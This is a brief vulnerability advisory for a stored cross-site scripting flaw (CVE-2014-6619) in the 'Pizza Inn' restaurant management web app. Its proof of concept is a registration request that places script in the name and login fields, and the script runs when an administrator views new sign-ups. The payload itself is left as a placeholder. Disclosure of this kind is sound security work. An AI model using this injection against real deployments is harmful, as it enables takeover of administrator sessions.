29 lines
No EOL
807 B
Text
29 lines
No EOL
807 B
Text
Title: Pizza Inn Registration Stored XSS
|
|
Severity: High
|
|
CVE-ID: CVE-2014-6619
|
|
Release Date: 20 September 2014
|
|
Author: Kenneth F. Belva
|
|
Websites: http://silverbackventuresllc.com
|
|
http://xssWarrior.com
|
|
http://securitymaverick.com
|
|
Twitter: @infosecmaverick
|
|
Contact: Please use website contact form.
|
|
Mail:
|
|
URL: http://sourceforge.net/projects/restaurantmis/
|
|
Vendor:
|
|
Remote Exploit: Yes
|
|
|
|
Discovered with: xssWarrior - http://xssWarrior.com
|
|
|
|
|
|
Description:
|
|
============
|
|
|
|
On registration the XSS code will be stored in the database. When the administrator views the new sign-ups it will execute.
|
|
|
|
|
|
Proof of Concept :
|
|
==================
|
|
|
|
http://[domain]/PizzaInn/register-exec.php
|
|
fname=[code]&lname=[code]&login=[code]&password=r00t&cpassword=r00t&question=8&answer=hack4&Submit=Register |